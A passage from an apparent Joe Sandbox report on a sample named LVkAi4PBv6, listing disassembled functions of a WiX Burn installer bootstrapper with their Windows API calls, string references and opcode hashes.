                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4224961946-4196573879
                                                                                                                                                                                                                                                                                                  • Opcode ID: 97e8ad8f422d37b21ebab34ac928a7ddde2143f60ccfdedf084c70d5a7b7e880
                                                                                                                                                                                                                                                                                                  • Instruction ID: ec392c32d8694bde0a94d4fbbd43c14710b894ef4170d8844a638398c0f23998
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97e8ad8f422d37b21ebab34ac928a7ddde2143f60ccfdedf084c70d5a7b7e880
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE117232940626BBDB11ABA89C06E9EBB68FF05770F118251F924F73D1E774DD109690
                                                                                                                                                                                                                                                                                                  Function 008A0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?,008653BD,00000000,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A0897
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08A1
                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08D3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08EC
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A092B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4040495316-1178289305
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1990162faaf07cc63944e2bf8c49597046e4f14b95a178b7b06d4c7262ad55ca
                                                                                                                                                                                                                                                                                                  • Instruction ID: d4886e712b559ad3ab06d90b925fe2be1475e276d6864d3e57008a9c926ba7ec
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1990162faaf07cc63944e2bf8c49597046e4f14b95a178b7b06d4c7262ad55ca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE21CF32E00629ABFB209B958C05A9FBFA8FF06711F158066AD14EB651E3748E009ED0
                                                                                                                                                                                                                                                                                                  Function 00876B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00876B49
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00876BB9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                                                                  • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                                                                                                                                                                                  • API String ID: 3498533004-3263533295
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c59ab6e6874b65f120aa3d92f44fce89e63ba4b807202a0927e38554527bf73
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8968489d91cc598e038f3e4b186f5d752d0b5e8fe52fcac039ba9aea2d088e82
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c59ab6e6874b65f120aa3d92f44fce89e63ba4b807202a0927e38554527bf73
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA11D631600A14BBDB205B6CDC45F9B7BA8FB46B74F054351FD28EB3D2E77494218691
                                                                                                                                                                                                                                                                                                  Function 008A3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 008A3574
                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(008CB6C8), ref: 008A3591
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,008CB6B8,?,?,?,?,?,?), ref: 008A35AC
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,008CB6B8,?,?,?,?,?,?), ref: 008A35B8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                                                                                                                                                  • API String ID: 2109125048-2356320334
                                                                                                                                                                                                                                                                                                  • Opcode ID: 12c8ef137001b3fbdb6b3e7a6daa5fc5fe05da6d8bd089b1a979d1b6f412d7f3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 539befc1eb3dd4efe7c2ac3f7f38e4be9db21156b18e85a2fb55f44c75f8a787
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12c8ef137001b3fbdb6b3e7a6daa5fc5fe05da6d8bd089b1a979d1b6f412d7f3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF0E530F4062667F7210FAABD0AF172DB9FB93B65F00092DF950C2A50E374C9418AB0
                                                                                                                                                                                                                                                                                                  Function 008A4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008A4A9D
                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 008A4ACA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 008A4AF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,008AB7A0,?,00000000,?,00000000,?,00000000), ref: 008A4B34
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 008A4B65
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1145190524-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4767708d6d494ab70174aee679ad1941854ed6f38e6d15dff60f283ea5a7bb2c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 502f1bd283dc889622e7615aa0559d31c986f617640f132bc6a6dc884adccf7c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4767708d6d494ab70174aee679ad1941854ed6f38e6d15dff60f283ea5a7bb2c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A31C436E40239ABEB119AD98C41FAFBAB8FF86760F114165FD14E7641E770DC0186E1
                                                                                                                                                                                                                                                                                                  Function 00862428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0089FFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0089FFEF,008812CF,?,00000000), ref: 0086246E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0089FFEF,008812CF,?,00000000,0000FDE9,?,008812CF), ref: 0086247A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c4dda9c52d6cf66546631e6e25e28f3106a72f4945ce9d5cfb9fd681f3d7ac7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 91bc151dabd9b8561c237b542ef5f93c9d1af2b2308a0988eb775ec5918891da
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4dda9c52d6cf66546631e6e25e28f3106a72f4945ce9d5cfb9fd681f3d7ac7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F310B30300A1AEFE7219E698CC4A7637DDFB45368B1242A9FE12EB291EF71CC019755
                                                                                                                                                                                                                                                                                                  Function 00880A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00880B27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00880B31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880B55
                                                                                                                                                                                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 00880B62
                                                                                                                                                                                                                                                                                                  • Invalid seek type., xrefs: 00880ABD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-417918914
                                                                                                                                                                                                                                                                                                  • Opcode ID: 58f55c4098997a1dc54a446c74ee160da28059663d1b3e73404c9f52f1ae66f5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 60a46924f9acaac8060adcddb677721b0ee93427fc5c588fe5ef7e12cc0fea17
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58f55c4098997a1dc54a446c74ee160da28059663d1b3e73404c9f52f1ae66f5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9431A071A4062AEFDB15EFA8C884EAEB7A9FF04728B148125F924D7751D330ED148F91
                                                                                                                                                                                                                                                                                                  Function 00864115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?), ref: 00864123
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000,00000000), ref: 00864131
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,840F01E8,00865489,?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000), ref: 0086419A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000,00000000), ref: 008641A4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2193988115
                                                                                                                                                                                                                                                                                                  • Opcode ID: 60aca52ac1dcdac9f46682c3cf982a64b691a69d729f6839bb9681edf279d239
                                                                                                                                                                                                                                                                                                  • Instruction ID: 30590a29517ac9105fef74119c964f9f561c68688aa8f10794005227af3c5c97
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60aca52ac1dcdac9f46682c3cf982a64b691a69d729f6839bb9681edf279d239
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3011DF26600339A6EB312AA55C40B3FB6A9FF77BA1F136021FD05EB241E7658D8192D1
                                                                                                                                                                                                                                                                                                  Function 008656A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00866595,00866595,?,0086563D,?,?,00000000), ref: 008656E5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086563D,?,?,00000000,?,?,00866595,?,00867F02,?,?,?,?,?), ref: 00865714
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1733990998-4228644734
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7af0d865e574f02b728f9cc6b7b43b7a1a47c000fd667bcedf60a4d21075f4db
                                                                                                                                                                                                                                                                                                  • Instruction ID: ffb9ede50eb6498f750751331504b1db8029f0458af80e98f7940551593bcb19
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af0d865e574f02b728f9cc6b7b43b7a1a47c000fd667bcedf60a4d21075f4db
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E521F637640A25EFD7158F98CD45E59BBA4FF0A770F260319F925EB390EA70EE018690
                                                                                                                                                                                                                                                                                                  Function 008A0A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008A0A38
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008A0A46
                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 008A0A8B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008A0A95
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 590199018-1178289305
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e780120733f8e12da1b8c6bc6a48faf99a46d494ea768030206576a7eb7f1c6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 31788459657e517acd3509a7d576dfd9304a501343456f0e086217d5ef269734
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e780120733f8e12da1b8c6bc6a48faf99a46d494ea768030206576a7eb7f1c6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F11E537D01336EBE7208B948908A9F7AA4FF06760F124265FD54EB680E270AD009ED1
                                                                                                                                                                                                                                                                                                  Function 008809EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00880A19,?,?,?), ref: 00881434
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088140C: GetLastError.KERNEL32(?,00880A19,?,?,?), ref: 0088143E
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00880A27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00880A31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880A55
                                                                                                                                                                                                                                                                                                  • Failed to read during cabinet extraction., xrefs: 00880A5F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2170121939-2426083571
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ae57e062684f3ad303129eed0d0cfad3eeca20c9c79a968d251df268c86e7c1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8129b7372303b312ccfe3a6f9df66f038d69102274d6be6213ad92c4ec67b051
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae57e062684f3ad303129eed0d0cfad3eeca20c9c79a968d251df268c86e7c1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11E136A40639BBCB25AF95DC04E9E7F68FF05760B014115FD14E7251D7309910CBD1
                                                                                                                                                                                                                                                                                                  Function 0088140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00880A19,?,?,?), ref: 00881434
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00880A19,?,?,?), ref: 0088143E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00881462
                                                                                                                                                                                                                                                                                                  • Failed to move to virtual file pointer., xrefs: 0088146C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
